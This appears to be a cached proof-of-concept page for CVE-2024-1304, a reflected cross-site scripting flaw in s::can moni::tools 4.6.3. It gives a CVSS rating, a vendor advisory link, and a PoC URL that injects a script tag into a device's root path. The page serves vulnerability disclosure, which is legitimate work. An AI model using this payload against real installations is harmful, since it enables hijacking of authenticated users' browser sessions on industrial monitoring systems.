Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-1304 PoC — s::can moni::tools 跨站脚本漏洞

Source
https://github.com/guillermogm4/CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS
Associated Vulnerability
Title:s::can moni::tools 跨站脚本漏洞 (CVE-2024-1304)
Description:s::can moni::tools是s::can公司的一个管理几乎无限数量的站点、在线探头、分析仪和参数的平台。 s::can moni::tools 4.6.3 版本存在跨站脚本漏洞,该漏洞源于允许远程攻击者向经过身份验证的用户发送特制的 JavaScript 负载,并部分劫持他们的浏览器会话。
Description
POC Badgermeter moni tool - CVE-2024-1304
Readme
# CVE-2024-1304 --- Badgermeter moni tool - Reflected Cross Site Scripting XSS
https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-badger-meters-monitool

CVE-2024-1304: 6.3 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L | CWE-79.

**Software link**: https://www.s-can.at/en/product/monitool/

**Version**: 4.6.3

**@author**: Guillermo García Molina

**Description**: The software s:can moni:tools up to and including version 4.6.3 is affected by an unauthenticated reflected cross-site scripting (XSS) vulnerability that allows remote attackers to inject arbitrary web script or HTML via the url.

## POC

The root url of the device, in this case http://192.168.0.1/, is affected by an unauthenticated injection of arbitrary code:

[http://192.168.0.1//sunku<script>alert(1)</script>l36qj ]
 
![XSS1](https://github.com/guillermogm4/CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS/assets/26895345/e725e472-2dce-430b-ae05-57ec6ac50dbc)

 
![image](https://github.com/guillermogm4/CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS/assets/26895345/774b91b5-38b4-4efa-b3cd-20436d2bb780)
File Snapshot

 [4.0K]  /data/pocs/13a3c4388c93eeacb4d63269d05a30a97c9c1eac
└── [1.1K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.